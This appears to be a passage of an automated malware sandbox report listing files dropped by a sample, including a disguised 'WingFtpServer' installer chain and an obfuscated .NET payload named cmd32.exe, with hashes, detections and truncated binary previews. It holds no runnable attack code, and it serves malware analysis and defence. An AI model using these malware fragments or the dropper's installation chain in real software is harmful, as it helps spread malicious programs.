                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1689268" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                                                                                C:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml (copy)

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2494
                                                                                                                                                                                                Entropy (8bit):5.210945042543981
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:2dS48pX4y/DvKWDkQpye7X8ICDKbs37Ti8TBM8PT52Yb3PPHpXUEqXpbfKFQRFNR:cAn/TLt0J/pXA1JVp/BJUSkC9+Tu+s
                                                                                                                                                                                                MD5:9F723536CCBD0D1BA6531E106C5C3C68
                                                                                                                                                                                                SHA1:D52FBB0840C388D388F4597E6210DED597EC96CB
                                                                                                                                                                                                SHA-256:C63562E6E16F03F4FBE46F386A7973A8446BA4519E73BDC774DE5CB7BA87A168
                                                                                                                                                                                                SHA-512:5F539176C957659D94416FC17A83EB6E2BE860752364A7DB394267A834D9604AEBAA0B282F180A95A95A1C9D2E902A6E4461C6E26BDE7848AD699E6391244486
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399998126404364</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399998126560620</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399998126404364</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">133051636774803094</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu

                                                                                                                                                                                                C:\ProgramData\USOPrivate\UpdateStore\updatestoretemp51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                Size (bytes):2494
                                                                                                                                                                                                Entropy (8bit):5.210945042543981
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:2dS48pX4y/DvKWDkQpye7X8ICDKbs37Ti8TBM8PT52Yb3PPHpXUEqXpbfKFQRFNR:cAn/TLt0J/pXA1JVp/BJUSkC9+Tu+s
                                                                                                                                                                                                MD5:9F723536CCBD0D1BA6531E106C5C3C68
                                                                                                                                                                                                SHA1:D52FBB0840C388D388F4597E6210DED597EC96CB
                                                                                                                                                                                                SHA-256:C63562E6E16F03F4FBE46F386A7973A8446BA4519E73BDC774DE5CB7BA87A168
                                                                                                                                                                                                SHA-512:5F539176C957659D94416FC17A83EB6E2BE860752364A7DB394267A834D9604AEBAA0B282F180A95A95A1C9D2E902A6E4461C6E26BDE7848AD699E6391244486
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399998126404364</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399998126560620</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399998126404364</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">133051636774803094</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z5i6tLOUD0.exe.log

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\Desktop\z5i6tLOUD0.exe
                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):612
                                                                                                                                                                                                Entropy (8bit):5.33730556823153
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPk21xzAbDLI4M0kvoDLI4MWuCOKbbDLI4MWuPJKiUrRZ9I0ZKhk:ML9E4Ks2vsXE4jE4KnKDE4KhK3VZ9pKe
                                                                                                                                                                                                MD5:08A80BA6C9FA7AD518949631A37A08F9
                                                                                                                                                                                                SHA1:27D59DD0D98BE6A7986BD690F9290451CAFD1536
                                                                                                                                                                                                SHA-256:BDBB0129FD9D6760CB29D06B764A239A2E21DE7792CF0415211FBDF5551519FE
                                                                                                                                                                                                SHA-512:CF00287F65F7D19C66F6AE2BEABAA9A442A5202F39E05B7E67BB56391212FDA0E06DB1F671A2A9CD52F3C12C230EAB7C0C6822A89CAAF5DBEDF14E9B84FA2C16
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\WingFtpServer.exe

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\Desktop\z5i6tLOUD0.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):20958709
                                                                                                                                                                                                Entropy (8bit):7.9994219064138035
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:393216:FgHyv44S5W52GAU9sdmtbCY+pqMK8o/DPe7FZvbmFX3xqeWafKi1KD5TKkVSPwwA:FzI5QZAgDx4kMFmSrUX3MeWafKiE5TzB
                                                                                                                                                                                                MD5:CF0D1C650627BF796FDC7775FDECB2E0
                                                                                                                                                                                                SHA1:AA603F30052F8CB40E0490E52A799C0372F7DD1A
                                                                                                                                                                                                SHA-256:3203490A478DFD78373E4471AD641A5C6B6F97231586B0DD4184019C81202B7B
                                                                                                                                                                                                SHA-512:279CA871A62665E34229F175846C4B8DB148CC1F4593823CEDB42B5CA3B17D6B4D2ABB4592892CEDBBC38873F7FC8873172A72596C284DBEE90F5DD480C23354
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......J.................P...........c.......p....@.................................B............@...................................0..D...........x...(U..........................................................P...L............................text....C.......D.................. ..`.itext..,....`.......H.............. ..`.data........p.......T..............@....bss.....V...........b...................idata...............b..............@....tls.................r...................rdata...............r..............@..@.reloc..T...........................@..B.rsrc...D....0.......t..............@..@.....................@..............@..@................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-3TKF2.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp
                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):6144
                                                                                                                                                                                                Entropy (8bit):4.215994423157539
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                                                                                                                                MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                                                                                                                                SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                                                                                                                                SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                                                                                                                                SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                • Filename: winscp438setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: 5YB5dKZ1Ow.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: 1dGBb5N0oG.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: BPtHMWjgi3.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: SecuriteInfo.com.Adware.Babylon.15.13567.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: 1899OIwxiA.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: iJh2yh3La8.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: KCR2JIl6tT.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: orbit-4-1-1-18-en-win.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: CCMaker.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: fa#U2310.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: veraport-g3-x64 (1).exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: yusetup7.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: LruEqu1rpq.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: fileinjector_696428535.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: zettelkasten-basics_484588750.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Synapse-X-Cracked_460637337.exe, Detection: malicious, Browse
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-3TKF2.tmp\_isetup\_shfoldr.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp
                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):23312
                                                                                                                                                                                                Entropy (8bit):4.596242908851566
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                                                                                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                                                                                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                                                                                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                                                                                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-3TKF2.tmp\setuphelper.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp
                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                Size (bytes):1384960
                                                                                                                                                                                                Entropy (8bit):6.643024942098032
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:Hk20UaUpuMzkufEToax+5uFWGqij0YZdQQHNLQraUuK8krZeM9Kp9feHE0ECjzR:9pDbfEToax+5uFWGqij0YZdQqYrcMgfW
                                                                                                                                                                                                MD5:936B3FF388B5893CDBF7ABB1DEBCA62C
                                                                                                                                                                                                SHA1:4136DBA88C54EDDFDAA7DA2D1921A65AA65573FC
                                                                                                                                                                                                SHA-256:CB9BE92DA900E82E3DF5BB0AFD9209F1F60C9ECFD49EE4FF33E677CFE05E9CD6
                                                                                                                                                                                                SHA-512:BC6AA2B550D5983D778426E565DD8CABA63B00CC85E4FD53BDD41D323224EDCDC0E211D4EB8873EBBE7ECA9C736A709B7C46B68DA2A24FA254306791BB5C2CBD
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...e..^.....................h....................@......................................................................................F......................................................................................f....................text...8........................... ..`.itext.............................. ..`.data....F.......H..................@....bss.....f...0...........................idata..............................@....didata.f...........................@....edata..............................@..@.rdata..E...........................@..@.reloc..............................@..B.rsrc....F.......F..................@..@....................."..............@..@........................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\WingFtpServer.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):8279040
                                                                                                                                                                                                Entropy (8bit):7.926959055180887
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:196608:uJtGh+zikz9dyUI7tgF18H2gXjOanBHT50LT/oIay2tz:u7sxkJdydJgFqHJT/dT50HoXJ
                                                                                                                                                                                                MD5:4137CF8E14B42B0E1C90AF7628E02978
                                                                                                                                                                                                SHA1:454DB1D471CD7F27139699185E878C997288BA06
                                                                                                                                                                                                SHA-256:7198267386D888CAC5535524364700F60267C611E9FA5683CB7E9D4196703F99
                                                                                                                                                                                                SHA-512:BB72F1F4E8C2627690590AED375B94BF7A2A91891B53457905F90BD865F25E70F49E56BDBD026C3FCA0AF906898B3402E5A1BE56504F9D1EE1A72D0C45DB062A
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......J.................|...N....................@..............................................@...........................0...7......._n.........................................................................X:..x............................text...hh.......j.................. ..`.itext..$............n.............. ..`.data...0/.......0..................@....bss....`_...............................idata...7...0...8..................@....tls....<....p...........................rdata..............................@..@.reloc..............................@..B.rsrc...._n......`n.................@..@.wtext...............J~................`................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nsf29D2.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\wns22DB.tmp
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):7409346
                                                                                                                                                                                                Entropy (8bit):7.958302362228628
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:196608:sRLqzi3tI29TS60FIEPgaJzR1VOoaOVxRtI:ULqzi3XT0uEp/ooaWzI
                                                                                                                                                                                                MD5:1842CDC82063CDC15AF0AD548A3AFA83
                                                                                                                                                                                                SHA1:176EADB99CD9350AB93C9CC5075D2978D3D81E40
                                                                                                                                                                                                SHA-256:08BD7857E8AB34B3C16F6468E106447386E7C31842A39E08D9CE650822ABF227
                                                                                                                                                                                                SHA-512:A3CA13BF81A3BB99E69F27002EDF911DD7355D9453AAFD49B9219ACED433E5CB295D864267F30C9A80124B0A29AF52C722BF3C5A5C51B1CA06F51F85B8F02F5F
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.^......,................A.......T......6^.......^..........................................................................................................................................................................................................................................G...J...............j...................................................................................................................................................z...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nsz2A01.tmp\nsExec.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\wns22DB.tmp
                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):6656
                                                                                                                                                                                                Entropy (8bit):5.155286976455086
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:YjHFiKaoggCtJzTlKXb0tbo68qD853Ns7GgmkNq3m+s:JbogRtJzTlNR8qD85uGgmkNr
                                                                                                                                                                                                MD5:EC0504E6B8A11D5AAD43B296BEEB84B2
                                                                                                                                                                                                SHA1:91B5CE085130C8C7194D66B2439EC9E1C206497C
                                                                                                                                                                                                SHA-256:5D9CEB1CE5F35AEA5F9E5A0C0EDEEEC04DFEFE0C77890C80C70E98209B58B962
                                                                                                                                                                                                SHA-512:3F918F1B47E8A919CBE51EB17DC30ACC8CFC18E743A1BAE5B787D0DB7D26038DC1210BE98BF5BA3BE8D6ED896DBBD7AC3D13E66454A98B2A38C7E69DAD30BB57
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L....~.\...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\wns22DB.tmp

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):7109767
                                                                                                                                                                                                Entropy (8bit):7.999706559392961
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:196608:k3A6TxJ7AyeFxfzIiWgT3Rk4t/3y+UFGRouLGNHx:iAGWxvWgT3Rk4t/x2GRk
                                                                                                                                                                                                MD5:2BEB8722EA464A6FFB7AE6DC1FE00EF7
                                                                                                                                                                                                SHA1:CA8A6DB7929B6DECD8280BD8CC1A4651FE286F20
                                                                                                                                                                                                SHA-256:B7004F11735037125DC9DE7EE91CFFAE47AFE53641773A205F7E4300773519A4
                                                                                                                                                                                                SHA-512:503D18F03B1A25CAF1109C3A99AB8E876DFE939E1534AB5F2A4B663BDD4BF62F99E960B640313CFEC469ECEC1C3CCADDFD11BDFA55C7B85431DCF5862BA5075E
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...y..\.................f.......@...4............@.......................... ............@.............................................`............................................................................................................text....d.......f.................. ..`.rdata...............j..............@..@.data...Xc...........~..............@....ndata...................................rsrc...`...........................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Roaming\cmd32.exe

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):21082624
                                                                                                                                                                                                Entropy (8bit):7.999846142951512
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:393216:DX/jor0w17nb++l8qsyb6qPrxjS6/y+lRb0vQSMGxuBZMfJsA9eslHOJ:rsr0S7nb9l8EnrdPpl10vQSlRfJ5fO
                                                                                                                                                                                                MD5:035A4F79912DD1710C6A24324DDDBB0B
                                                                                                                                                                                                SHA1:DBD4C4612A7FB75A8AE23294072E398ED47552FD
                                                                                                                                                                                                SHA-256:417EA3585515662A88109B63A6EF89EF4EA592C35C0774F4D605D736254D1B12
                                                                                                                                                                                                SHA-512:EAA889E7CAD566CC990442F8070DE7551A4D843BD62DEE0EFDC5DF8762A19DF0065D8FBFC7E1F3FA200803F717D296577A53B17FAC7BF718558F9E9B5E9EF620
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[..c.................|A..4.......A.. ....A...@.. ........................B...........@...................................A.J.....A..1....................A...................................................... ............... ..H............text....zA.. ...|A................. ..`.rsrc....1....A..2...~A.............@..@.reloc........A.......A.............@..B.................A.....H.......8...0X..........h...4.@..........................................0...........+.+.*.+..+..0..V........,.~....+'+(,.~....+&.+&.,..-.*+$,. ....+.+#z.,.*.+.(....+..+.(....+..+.(^...+.sK...+....*....(L...*N+.-.*+.&*.+.(....+...*..0..........+.+.+.+.*s....+..+..+.o....+.....0..........~....~......8.... (...8....8....8....8....~.... -...8.... ....8....8....8.... ....(^...(....(....&.......... ....(^... ....(^...(.......~....(....... ....(^.......... ....(^....~.....(....(...

                                                                                                                                                                                                C:\Users\user\AppData\Roaming\cmd32.exe:Zone.Identifier

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                C:\Windows\Logs\waasmedic\waasmedic.20220912_171757_809.etl

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):8192
                                                                                                                                                                                                Entropy (8bit):2.7425168537824893
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:m1qr52I5PGIb7kUD9b7kEXpb7kllb7kqnb7kbIl9lOb7k0tpl0b7kLzb7k1b7kwK:X2IAI0Ux0C070A0U9E0Cl00Lz010t09O
                                                                                                                                                                                                MD5:1A547AD192B410FF0EE5AD3427150E6A
                                                                                                                                                                                                SHA1:D942FC3CA73E05B67A7D68F37B924C5B8534DD2E
                                                                                                                                                                                                SHA-256:4BD4A4035CB0600A66DC443A594328EC72A8A43E11088D0F3872FDB3455EC930
                                                                                                                                                                                                SHA-512:F43509E053AC0E908CD6CCE722BF21BB92A64ED25F546A939C733B03F2FEE01C7B33DA14D790E939A0E6B65A74CCF2844C8A12D47914B4B549E6956846975541
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:....................................................!.....................................]......................B........3.....Zb....... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.................................................................... .......c.............E.C.C.B.1.7.5.F.-.1.E.B.2.-.4.3.D.A.-.B.F.B.5.-.A.8.D.5.8.A.4.0.A.4.D.7...C.:.\.W.i.n.d.o.w.s.\.l.o.g.s.\.w.a.a.s.m.e.d.i.c.\.w.a.a.s.m.e.d.i.c...2.0.2.2.0.9.1.2._.1.7.1.7.5.7._.8.0.9...e.t.l.............P.P...........].................................................................9.B...].....17134.1.amd64fre.rs4_release.180410-1804............5.@...].....OYo."(.s..O........WaaSMedicSvc.pdb............................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                Size (bytes):9062
                                                                                                                                                                                                Entropy (8bit):3.169211212120735
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:cY+38+DJ5+inJg3+igJU+LY+XY+ntn+E5L+M/9+S4:j+s+j+j3+12+0+I+9+C+a+x
                                                                                                                                                                                                MD5:080570BAF1FBADDE71DADEAF4D220296
                                                                                                                                                                                                SHA1:9EB9601CD252519E5C9752931FCA0CE30B32BED5
                                                                                                                                                                                                SHA-256:344B915E4BBFD797FB4A05082B1A2CDAE3111379EF3070242DAC8F413F372BEE
                                                                                                                                                                                                SHA-512:59B939AB1BEA4E352758649D8CCA08BD09E516AFB9A514C499D85438D93CD52E77D2C5C7A187CFC05188DD5A7227DBD2F3A9418217F892A763C776F141FADFDB
                                                                                                                                                                                                Malicious:false
